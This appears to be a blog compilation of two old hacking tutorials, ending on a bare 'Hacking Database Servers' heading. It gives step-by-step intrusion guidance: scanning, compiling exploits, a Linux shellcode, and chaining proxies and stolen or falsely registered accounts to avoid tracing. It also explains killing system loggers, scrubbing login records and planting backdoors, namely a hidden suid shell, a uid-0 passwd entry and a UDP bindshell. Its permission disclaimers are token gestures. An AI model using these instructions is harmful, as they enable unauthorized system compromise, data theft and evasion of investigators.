This section needs to be further broken down into two catigories of script kiddies: ones who scan the net for a host that is vuln to a certain exploit and ones who search a certain site for any exploit. The ones you see on alldas are the first kind, they scan thousands of sites for a specific exploit. They do not care who they hack, anyone will do. They have no set target and not much of a purpose. In my opinion these people should either have a cause behind what they are doing, ie. "I make sure people keep up to date with security, I am a messanger" or "I am spreading a political message, I use defacments to get media attention". People who deface to get famous or to show off their skills need to grow up and relize there is a better way of going about this (not that I support the ones with other reasons ether). Anyways, the two kinds and what you need to know about them:

Scanning Script Kiddie: You need to know what signs of the hole are, is it a service? A certain OS? A CGI file? How can you tell if they are vuln? What version(s) are vuln? You need to know how to search the net to find targets which are running whatever is vuln. Use altavista.com or google.com for web based exploits. Using a script to scan ip ranges for a certain port that runs the vuln service. Or using netcraft.com to find out what kind of server they are running and what extras it runs (frontpage, php, etc..) nmap and other port scanners allow quick scans of thousands of ips for open ports. This is a favorate technique of those guys you see with mass hacks on alldas.

Targetted Site Script Kiddie: More respectable then the script kiddies who hack any old site. The main step here is gathering as much information about a site as possible. Find out what OS they run at netcraft or by using: telnet www.site.com 80 then GET / HTTP/1.1 Find out what services they run by doing a port scan. Find out the specifics on the services by telnetting to them. Find any cgi script, or other files which could allow access to the server if exploited by checking /cgi /cgi-bin and browsing around the site (remember to index browse)

Wasn't so hard to get the info was it? It may take awhile, but go through the site slowly and get all the information you can.

2. Getting In
Now that we got the info on the site we can find the exploit(s) we can use to get access. If you were a scanning script kiddie you would know the exploit ahead of time. A couple of great places to look for exploits are Security Focus and packetstorm. Once you get the exploit check and make sure that the exploit is for the same version as the service, OS, script, etc.. Exploits mainly come in two languages, the most used are C and perl. Perl scripts will end in .pl or .cgi, while C will end in .c To compile a C file (on *nix systems) do gcc -o exploit12 file.c then: ./exploit12 For perl just do: chmod 700 file.pl (not really needed) then: perl file.pl. If it is not a script it might be a very simple exploit, or just a theory of a possible exploit. Just do alittle research into how to use it. Another thing you need to check is weither the exploit is remote or local. If it is local you must have an account or physical access to the computer. If it is remote you can do it over a network (internet).

Don't go compiling exploits just yet, there is one more important thing you need to know

Covering Your Tracks
So by now you have gotten the info on the host inorder to find an exploit that will allow you to get access. So why not do it? The problem with covering your tracks isn't that it is hard, rather that it is unpredictable. just because you killed the sys logging doesn't mean that they don't have another logger or IDS running somewhere else. (even on another box). Since most script kiddies don't know the skill of the admin they are targetting they have no way of knowing if they have additional loggers or what. Instead the script kiddie makes it very hard (next to impossible) for the admin to track them down. Many use a stolden or second isp account to begin with, so even if they get tracked they won't get caught. If you don't have the luxery of this then you MUST use multiple wingates, shell accounts, or trojans to bounce off of. Linking them together will make it very hard for someone to track you down. Logs on the wingates and shells will most likely be erased after like 2-7 days. That is if logs are kept at all. It is hard enough to even get ahold of one admin in a week, let alone further tracking the script kiddie down to the next wingate or shell and then getting ahold of that admin all before the logs of any are erased. And it is rare for an admin to even notice an attack, even a smaller percent will actively pursue the attacker at all and will just secure their box and forget it ever happend. For the sake of arugment lets just say if you use wingates and shells, don't do anything to piss the admin off too much (which will get them to call authoritizes or try to track you down) and you deleting logs you will be safe. So how do you do it?

We will keep this very short and too the point, so we'll need to get a few wingates. Wingates by nature tend to change IPs or shutdown all the time, so you need an updated list or program to scan the net for them. You can get a list of wingates that is well updated at http://www.cyberarmy.com/lists/wingate/ and you can also get a program called winscan there. Now lets say we have 3 wingates:

212.96.195.33 port 23
202.134.244.215 port 1080
203.87.131.9 port 23

to use them we go to telnet and connect to them on port 23. we should get a responce like this:

CSM Proxy Server >

to connect to the next wingate we just type in it's ip:port

CSM Proxy Server >202.134.244.215:1080
If you get an error it is most likely to be that the proxy you are trying to connect to isn't up, or that you need to login to the proxy. If all goes well you will get the 3 chained together and have a shell account you are able to connect to. Once you are in your shell account you can link shells together by:

[j00@server j00]$ ssh 212.23.53.74

You can get free shells to work with until you get some hacked shells, here is a list of free shell accounts. And please remember to sign up with false information and from a wingate if possible.

SDF (freeshell.org) - http://sdf.lonestar.org
GREX (cyberspace.org) - http://www.grex.org
NYX - http://www.nxy.net
ShellYeah - http://www.shellyeah.org
HOBBITON.org - http://www.hobbiton.org
FreeShells - http://www.freeshells.net
DucTape - http://www.ductape.net
Free.Net.Pl (Polish server) - http://www.free.net.pl
XOX.pl (Polish server) - http://www.xox.pl
IProtection - http://www.iprotection.com
CORONUS - http://www.coronus.com
ODD.org - http://www.odd.org
MARMOSET - http://www.marmoset.net
flame.org - http://www.flame.org
freeshells - http://freeshells.net.pk
LinuxShell - http://www.linuxshell.org
takiweb - http://www.takiweb.com
FreePort - http://freeport.xenos.net
BSDSHELL - http://free.bsdshell.net
ROOTshell.be - http://www.rootshell.be
shellasylum.com - http://www.shellasylum.com
Daforest - http://www.daforest.org
FreedomShell.com - http://www.freedomshell.com
LuxAdmin - http://www.luxadmin.org
shellweb - http://shellweb.net
blekko - http://blekko.net

once you get on your last shell you can compile the exploit, and you should be safe from being tracked. But lets be even more sure and delete the evidence that we were there.

Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. The real script kiddies might even use a rootkit to automaticly delete the logs. Although lets assume you aren't that lame. There are two main logging daemons which I will cover, klogd which is the kernel logs, and syslogd which is the system logs. First step is to kill the daemons so they don't log anymore of your actions.

[root@hacked root]# ps -def | grep syslogd
[root@hacked root]# kill -9 pid_of_syslogd

in the first line we are finding the pid of the syslogd, in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd.

[root@hacked root]# ps -def | grep klogd
[root@hacked root]# kill -9 pid_of_klogd

Same thing happening here with klogd as we did with syslogd.

now that killed the default loggers the script kiddie needs to delete themself from the logs. To find where syslogd puts it's logs check the /etc/syslog.conf file. Of course if you don't care if the admin knows you were there you can delete the logs completely. Lets say you are the lamest of the script kiddies, a defacer, the admin would know that the box has been comprimised since the website was defaced. So there is no point in appending the logs, they would just delete them. The reason we are appending them is so that the admin will not even know a break in has accurd. I'll go over the main reasons people break into a box:

To deface the website. - this is really lame, since it has no point and just damages the system.

To sniff for other network passwords. - there are programs which allow you to sniff other passwords sent from and to the box. If this box is on an ethernet network then you can even sniff packets (which contain passwords) that are destine to any box in that segment.

To mount a DDoS attack. - another lame reason, the admin has a high chance of noticing that you comprimised him once you start sending hundreds of MBs through his connection.

To mount another attack on a box. - this and sniffing is the most commonly used, not lame, reason for exploiting something. Since you now how a rootshell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell.

To get sensitive info. - some corperate boxes have alot of valueable info on them. Credit card databases, source code for software, user/password lists, and other top secret info that a hacker may want to have.

To learn and have fun. - many people do it for the thrill of hacking, and the knowledge you gain. I don't see this as horrible a crime as defacing. as long as you don't destroy anything I don't think this is very bad. Infact some people will even help the admin patch the hole. Still illegal though, and best not to break into anyone's box.

I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history
These files are usually in /var/log/ but I have heard of them being in /etc/ /usr/bin/ and other places. Since it is different on alot of boxes it is best to just do a find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. and also search threw the /usr/ /var/ and /etc/ directories for other logs. Now for the explanation of these 3.

utmp is the log file for who is on the system, I think you can see why this log should be appended. Because you do not want to let anyone know you are in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. Should be appended to show that you never logged in or out. and lastlog is a file which keeps records of all logins. Your shell's history is another file that keeps a log of all the commands you issued, you should look for it in your $ HOME directory and edit it, .sh_history, .history, and .bash_history are the common names. you should only append these log files, not delete them. if you delete them it will be like holding a big sign infront of the admin saying "You've been hacked". Newbie script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out. In this case I would suggest that you never try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if they are logs) or do a find for files which have been editted, this command would be: find / -ctime 0 -print

A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0's, clear will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script in deleting account logging from my experience. Most rootkits have a log cleaning script, and once you installed it logs are not kept of you anyways. If you are on NT the logs are at C:\winNT\system32\LogFiles\, just delete them, nt admins most likely don't check them or don't know what it means if they are deleted.

One final thing about covering your tracks, I won't go to into detail about this because it would require a tutorial all to itself. I am talking about rootkits. What are rootkits? They are a very widely used tool used to cover your tracks once you get into a box. They will make staying hidden painfree and very easy. What they do is replace the binaries like login, ps, and who to not show your presence, ever. They will allow you to login without a password, without being logged by wtmp or lastlog and without even being in the /etc/passwd file. They also make commands like ps not show your processes, so no one knows what programs you are running. They send out fake reports on netstat, ls, and w so that everything looks the way it normally would, except anything you do is missing. But there are some flaws in rootkits, for one some commands produce strange effects because the binary was not made correctly. They also leave fingerprints (ways to tell that the file is from a rootkit). Only smart/good admins check for rootkits, so this isn't the biggest threat, but it should be concidered. Rootkits that come with a LKM (loadable kernel module) are usually the best as they can pretty much make you totally invisible to all others and most admins wouldn't be able to tell they were comprimised.

In writting this tutorial I have mixed feelings. I do not want more script kiddies out their scanning hundreds of sites for the next exploit. And I don't want my name on any shouts. I rather would like to have people say "mmm, that defacing crap is pretty lame" especially when people with no lives scan for exploits everyday just to get their name on a site for a few minutes. I feel alot of people are learning everything but what they need to know inorder to break into boxes. Maybe this tutorial cut to the chase alittle and helps people with some knowledge see how simple it is and hopefully make them see that getting into a system is not all it's hyped up to be. It is not by any means a full guide, I did not cover alot of things. I hope admins found this tutorial helpful aswell, learning that no matter what site you run you should always keep on top of the latest exploits and patch them. Protect yourself with IDS and try finding holes on your own system (both with vuln scanners and by hand). Also setting up an external box to log is not a bad idea. Admins should have also seen alittle bit into the mind of a script kiddie and learned a few things he does.. this should help you catch one if they break into your systems.

On one final note, defacing is lame. I know many people who have defaced in the past and regret it now. You will be labeled a script kiddie and a lamer for a long, long time.

Learn to hack in easy steps

2008-01-23T21:49:00.000-08:00

Learn to hack in easy steps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Introduction

~~~~~~~~~~~~

Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've

met. I want to write this because most tutorials i've found (very good tutorials) are now

old and don't fit just like they did before. This is why i'm going to teach you and show you

the way to learn to hack.

If you are a hacker, you read this, and find something that's not correct or you don't like,

i want to know. mail me.

I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and

i don't care at all as long as it's understandable.

On this document I talk about many security tools, you can find all them on my site: www.3b0x.com

When you finish reading it, please TELL ME how you like it!

I want to make newer versions of it, check on my site to stay informed.

COPYING: You're welcome to distribute this document to whoever the hell you want, post it

on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.

If you want to perform it, ask me for permission. thanks a lot!

DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to

promote computer crime and I'm not responible of your actions in any way.

If you want to hack a computer, do the decent thing and ask for permission first.

Let's start

~~~~~~~~~~~

If you read carefully all what i'm telling here, you are smart and you work hard on it,

you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).

A hacker is someone who is able to discover unknown vulnerabilities in software and able to

write the proper codes to exploit them.

NOTE: If you've been unlucky, and before you found this document, you've readen the

guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.

You won't understand some things from my tutorial until you unpoison your brain.

Some definitions

~~~~~~~~~~~~~~~~

I'm going to refer to every kind of computer as a box, and only as a box.

This includes your PC, any server, supercomputers, nuclear silos, HAL9000,

Michael Knight's car, The Matrix, etc.

The systems we're going to hack (with permission) are plenty of normal users, whose

don't have any remote idea about security, and the root. The root user is called

superuser and is used by the admin to administer the system.

I'm going to refer to the users of a system as lusers. Logically, I'll refer to

the admin as superluser.

Operating Systems

~~~~~~~~~~~~~~~~~

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,

or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating

systems.

This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and

so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better

than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless

you're running some kind of it.

Let's see where to find the unix you're interested on.

The UNIX systems may be divided in two main groups:

- commercial UNIXes

- free opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,

so forget it.

The free opensource UNIXes can also be divided in:

- BSD

These are older and difficult to use. The most secure OS (openBSD) is in this group.

You don't want them unless you're planning to install a server on them.

- Linux

Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.

It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

Visit www.suse.de and look for a local store or order it online.

(i know i said it the software was free, but not the CDs nor the manual nor the support.

It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

It's possible you have problem with your hardware on the installation. Read the manual, ask

for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.

Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll

never become a hacker if you don't read a lot of that 'literature'.

the Internet

~~~~~~~~~~~~

Yes! you wanted to hack, didn't you? do you want to hack your own box or what?

You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze

and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.

You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net,

so go and set up your modem (using YaST2 in SuSE).

Common problems:

If your box doesn't detect any modems, that probably means that you have no modem installed

:-D (not a joke!).

Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are

specifically designed to work ONLY on windoze. Don't blame linux, this happens because the

winmodem has not a critical chip that makes it work. It works on windoze cause the vendor

driver emulates that missing chip. And hat vendor driver is only available for windoze.

ISA and external modems are more probably real modems, but not all of them.

If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the

internet with aol. You can't hack with aol. i don't like aol. aol sucks.

Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,

leave aol and get a real ISP. Then you'll be forgiven.

Don't get busted

~~~~~~~~~~~~~~~~

Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.

It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

- Don't hack

this is the most effective stealth technique. not even the FBI can bust you. :-)

If you choose this option, stop reading now, cause the rest is worthless and futile.

- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find

your own website oe email address, find your ISP, your phone number, your home...

and you get busted!!

- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.

NEVER tell others you've hacked a box.

- NEVER hack directly from your box (your_box --> victim's box).

Always use a third box in the middle (your_box --> lame_box --> victim's box).

Where lame_box is a previously hacked box or...a shell account box!

A shell account is a service where you get control of a box WITHOUT hacking it.

There are a few places where shell accounts are given for free. One of them is nether.net.

- Don't hack dangerous boxes until you're a real hacker.

Which boxes are dangerous:

Military boxes

Government boxes

Important and powerful companies' boxes

Security companies' boxes

Which boxes are NOT dangerous:

Educational boxes (any .edu domain)

Little companies' boxes

Japanese boxes

- Always connect to the internet through a free and anonymous ISP

(did i tell you that AOL is NOT an ISP?)

- Use phreking techniques to redirect calls and use others' lines for your ISP call.

Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.

TCP ports and scanning

~~~~~~~~~~~~~~~~~~~~~~

Do you got your stealth linux box connected to the internet (not aol)?

Have you read the manual as i told you?

Then we shall start with the damn real thing.

First of all, you should know some things about the internet. It's based on the TPC/IP protocol,

(and others)

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for

your data to be sent.

So you can open a connection and send data to any these ports. Those ports are associated with

a service:

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs

on the box, opens its port and offers their damn service.

here are some common ports and their usual services (there are a lot more):

Port number Common service Example daemon (d stands for daemon)

21 FTP FTPd

23 Telnet telnetd

25 SMTP sendmail (yes!)

80 HTTP apache

110 POP3 qpop

Example:

when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80

-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'

(it really sends a lot of things more, but that is the essential)

-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to

connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.

You can get nmap from my site in tarball or rpm format.

Let's install nmap from an .rpm packet.

bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )

Interesting ports on target.edu (xx.xx.xx.xx):

(The 1518 ports scanned but not shown below are in state: closed)

Port State Service

21/tcp open ftp

23/tcp open telnet

25/tcp open smtp

80/tcp open http

110/tcp open pop3

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

I know, i said telnet is a service but is also a program (don't let this confuse you).

This program can open a TCP connection to the port you specify.

So lets see what's on that ports.

On your linux console, type:

bash-2.03$ telnet target.edu 21

Trying xx.xx.xx.xx...

Connected to target.edu.

Escape character is '^]'.

220 target.edu FTP server (SunOS 5.6) ready.

quit

221 Goodbye.

Connection closed by foreign host.

You see?

They speak out some valuable information:

-their operating system is SunOS 5.6

-their FTP daemon is the standard provided by the OS.

bash-2.03$ telnet target.edu 25

Trying xx.xx.xx.xx...

Connected to target.edu.

Escape character is '^]'.

220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0

400 (EDT)

quit

221 2.0.0 target.edu closing connection

Connection closed by foreign host.

They like to tell us everything:

-their SMTP daemon is sendmail

-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

Why is this information useful to us? cause the security bugs that can let us in depend

on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons are they running, but we can know FOR SURE

what's the operating system:

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )

Interesting ports on target.edu (xx.xx.xx.xx):

(The 1518 ports scanned but not shown below are in state: closed)

Port State Service

21/tcp open ftp

23/tcp open telnet

25/tcp open smtp

80/tcp open http

110/tcp open pop3

TCP Sequence Prediction: Class=random positive increments

Difficulty=937544 (Good luck!)

Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,

but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know

what's the OS there and its very difficult to avoid it.

Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells

you their difficulty is low, that means their TCP sequence is predictable and we

can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.

And we don't want the admins to get angry with us, that's why we used the -sS option.

This way (most) hosts don't detect ANYTHING from the portscan.

Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better

usage of nmap's features, read its man page:

bash-2.03$ man nmap

How to upload and compile programs

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The most obvious and simple way is using FTP:

bash-2.03$ ls

program.c

sh-2.03$ ftp target.edu

Connected to target.edu.

220 target.edu FTP server (SunOS 5.6) ready.

Name: luser

331 Password required for luser.

Password:

230 User luser logged in.

ftp> put program.c

200 PORT command successful.

150 ASCII data connection for program.c (204.42.253.18,57982).

226 Transfer complete.

ftp> quit

221 Goodbye.

But this is not a really good way. It can create logs that will make the admin to detect us.

Avoid uploading it with FTP as you can, use cut&paste instead.

Here's how to make it:

we run a text editor

sh-2.03$ pico exploit.c

if it doesn't work, try this one:

sh-2.03$ vi exploit.c

Of course, you must learn how to use vi.

Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,

ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the

text from it. Change to your target and paste the code so you've 'uploaded' the file.

To cut a text from the screen, you need to install the gpm packet from your linux distribution.

This program lets you select and cut text with your mouse.

If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

Once you get the .c file there, here's how to compile:

sh-2.03$ gcc program.c -o program

and execute:

sh-2.03$ ./program

Exploiting vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~

This is the most important part of our hacking experience. Once we know what target.edu

is running, we can go to one of those EXPLOIT databases that are on the net.

A exploit is a piece of code that exploits a vulnerability on its software. In the case of

target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon

that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy

exploitable. If your target gots an old version, you'll probably get in easyly.

When we exploit a security bug, we can get:

- a normal shell (don't know what a shell is? read a book of unix!)

a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.

this one lets us send commands to the box, but we got limited priviledges.

- a root shell

this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

www.hack.co.za

www.r00tabega.org

www.rootshell.com

www.securityfocus.com

www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.

They usually come in .c language.

The most standar and easy to use exploits are buffer overflows.

I won't explain here how a buffer overflow does work,

Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.

You can download it from my site. (www.3b0x.com)

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.

This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell

is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

You gotta replace it by the shellcode for the OS your target is running.

You can find shellcodes for most OSes on my site or create your own by reading

the text i mentioned before (Smash The Stack For Fun And Profit).

IMPORTANT: before continuing with the practice, ask your target for permission to hack them.

if they let you do it, then you shall continue.

if they don't give you permission, STOP HERE and try with another one.

shall you continue without their permission, you'd be inquiring law and

i'm not responible of your craziness in any way!!!

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

bash-2.03$ telnet myshellaccount 23

Trying xx.xx.xx.xx...

Connected to yourshellaccount.

Escape character is '^]'.

Welcome to yourshellaccount

login: malicioususer

Password: (it doesn't display)

Last login: Fry Sep 15 11:45:34 from .

sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:

sh-2.03$ gcc exploit.c -o exploit

we execute it:

sh-2.03$ ./exploit

This is a sendmail 8.9.11 exploit

usage: ./exploit target port

Sendmail works on port 25, so:

sh-2.03$./exploit 25 target.edu

Cool, '$' means we got a shell! Let's find out if we're root.

$whoami

root

Damn, we've rooted target.edu!

$whyamiroot

because you've hacked me! :-) (just kidding)

There are some exploits that don't give you root directly, but a normal shell.

It depends on what luser is running the daemon. (sendmail is usually root)

Then you'll have to upload a .c file with a local (local means it can't overflow

a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP as you can.

Other kind of exploit is the one that gives you access to the password file.

If a host gots port 23 (telnet) opened, we can login as a normal user

(remote root logins are usually not allowed) by putting his/hers/its username

and password. Then use the su command to become root.

sh-2.03$ telnet target.edu 23

Trying xx.xx.xx.xx...

Connected to target.edu.

Escape character is '^]'.

We're running SunOS 5.7

Welcome to target.edu

login: luser

Password: (it doesn't display)

Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

sh-2.03$ whoami

luser

Are we lusers?

sh-2.03$ su root

Password:

Don't think so...

sh-2.03$ whoami

root

sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.

Then, let's suppose we've extracted the password from luser and root. We can't login as

root so we login as luser and run su. su asks us for the root password, we put it and...

rooted!!

The problem here is that is not easy to extract a root password from a password file.

Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word

or a person's name.

I said some admins are idiot (some of them are smart), but lusers are the more most

idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,

you'll find that lusers set up rlogin doors for you to enter without a password, etc.

Not to mention what happens when an admin gives a normal luser administrator priviledges

with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called

"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).

Of course, I haven't listed all the exploit kinds that exist, only the most common.

Putting backdoors

~~~~~~~~~~~~~~~~~

Ok, we've rooted the system. Then what?

Now you're able to change the webpage of that .edu box. Is that what you want to do?

Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu

box, but they're not ashaming them with such things.

Hacktivism is good and respected. You can change the page of bad people with bad ideologies

like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.

REMEMBER: ask for permission first!

No, this time you should do another thing. You should keep that system for you to play with

as a toy! (remember: your_box --> lame_box --> victim's box)

Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get

back in.

And it may not be possible:

- the admin changed his password to something uncrackable.

- they updated sendmail to a newer version so the exploit doesn't work.

So now we're root and we can do everything, we shall put some backdoors that let us get back in.

It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)

Anyway, i'll explain the basics of it.

1.How to make a sushi:

To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid

permissions:

sh-2.03$ cp /bin/sh /dev/nul

In the strange case the admin looks at /dev, he wouldn't find something unusual cause

/dev/null does exist (who notices the difference?).

sh-2.03$ cd /dev

sh-2.03$ chown root nul

Should yet be root-owned, but anyway...

sh-2.03$ chmod 4775 nul

4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.

We've finished our 'duty', let's logout:

sh-2.03$ exit

Then, when we come back some day:

sh-2.03$ whoami

luser

sh-2.03$ /dev/nul

sh-2.03$ whoami

root

We're superluser again!

There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.

we'd upload then the shell we want and make a sushi with it.

The shell we want for this is SASH. A stand-alone shell with built-in commands.

This one doesn't drop suid perms, and the commands are built-in, so external commands

can't drop perms too! Remember to compile it for the architecture of the target box.

Do you know where to get sash from? From my site :-). (www.3b0x.com)

2.How to add fake lusers.

You gotta manipulate the users file: /etc/passwd

try this:

sh-2.03$ pico /etc/passwd

if it doesn't work, try this:

sh-2.03$ vi /etc/passwd

Of course, you must learn how to use vi.

This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell

When uid=0 and gid=0, that luser gets superluser priviledges.

Then we add a line like this:

dood::0:0:dood:/:/bin/sh (put it in a hidden place)

So, once we get a shell, we type:

sh-2.03$ su dood

sh-2.03$ whoami

dood

And now we're root because dood's uid=0 and gid=0.

Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake

program in /bin that executes the shell you want with suid perms.

I haven't got such a program at my site, but it shouldn't be difficult to develope.

3.How to put a bindshell.

A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).

The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)

and give a shell to you when you connect. The cool thing of UDP is this:

If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!

They rarely remember UDP exists.

You can get an UDP bindshell coded by !hispahack from my site.

Cleaning up

~~~~~~~~~~~

Remember when we logedin to target.edu as luser, and used su to become root?

Take a look to this line:

Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

Yes, that was displayed by the target box when we logedin there.

It refers to the last login that the real luser did.

So, what will be displayed when luser logsin again?

Last login: Sun Sep 24 10:32:14 from .

Then luser writes a mail to the admin:

"It has happen some strange thing, when I loggedin today, I've read a line like this:

Last login: Sun Sep 24 10:32:14 from .

Does it mean I did login yesterday? It can't be, I don't work on sundays!

I think it's a bug and this is your fault."

The admin responds to luser:

"That wasn't a bug! this line means someone acceded the system using your password, don't

worry for that, we got his IP. That means we can ask his ISP what phone number did call

at 10:32 and get . Then we shall call the police and he'll get busted"

So you'll get busted because luser was a bit clever (sometimes happens).

So we gotta find a way to delete that.

This information can be stored in:

/usr/adm/lastlog

/var/adm/lastlog

/var/log/lastlog

and we can erase it using lled (get it from my site)

lled gots a buitin help that explains how to use it, remember to chmod the fake file

created by lled like the substitute lastlog file.

There is also some information we'd like to erase:

Remember when i told you not to use FTP? Well, in case you did it, you must now

use wted to clean up. Its sintax is very similar to lled.

you can get it from my site.

The who command shows us (and the admin) which lusers are logedin at the moment.

What if we login and the admin is there?

sh-2.03$ who

root tty1 Sep 25 18:18

Then we shall use zap2. If you loggedin as 'luser', then type:

sh-2.03$ ./zap2 luser

Zap2!

sh-2.03$ who

sh-2.03$

And luser has never been here.

Greetings

~~~~~~~~~

Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you

decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)

for more advanced tutorials so you can improve your skills.

I'd get very happy if you send me a mail telling me your impression about this paper (wether

is good or bad), and you help me to improve it.

I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups

or other tutorials like this one. thanks to a

Hacking Database Servers

2008-01-23T21:44:00.000-08:00

Hacking Database Servers

